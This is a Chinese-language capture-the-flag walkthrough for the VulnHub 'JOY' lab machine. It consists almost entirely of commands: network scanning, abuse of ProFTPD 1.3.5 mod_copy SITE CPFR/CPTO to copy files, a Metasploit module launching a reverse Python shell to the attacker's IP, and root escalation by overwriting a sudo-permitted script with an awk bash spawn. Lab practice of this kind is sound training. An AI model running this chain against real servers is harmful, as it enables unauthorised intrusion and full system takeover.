虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
虚拟机简介:渗透测试会激发快乐吗?如果是这样,这台机器就是给你的
目标:1个flag
级别:中级
arp-scan 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.129
查看开放21、22、25、80、110、139、445等多个端口
ftp 192.168.207.129
没有发现有用信息
cd download
dir
cd ..
cd upload
dir
get directory
查看文件内容,提示在Patrick的家目录中,并且存在一个version_control文件
SITE命令:
指定用于直接在服务器上从一个地方复制到另一个地方的目标文件/目录希望复制文件/目录的客户端首先发送SITE CPFR 命令,然后发送SITE CPTO
由于匿名账号存在读写权限,所以可以操作文件
telnet 192.168.207.129 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
get version_control
cat version_control
获取到ftp版本为1.3.5,同时获取到网站路径为/var/www/tryingharderisjoy
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.207.129
set SITEPATH /var/www/tryingharderisjoy
set payload payload/cmd/unix/reverse_python
set lhost 192.168.207.130
run
python -c 'import pty; pty.spawn("/bin/bash")'
cd ossec
cat patricksecretsofjoy
发现可疑文件中包含账号和口令信息
su - patrick
sudo -l
sudo /home/patrick/script/test
脚本没有其他命令可执行
创建本地脚本文件,通过ftp进行上传文件
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
ftp 192.168.207.129
cd upload
put test
telnet 192.168.207.129 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
已经获取到root权限
sudo /home/patrick/script/test
cd /root
cat proof.txt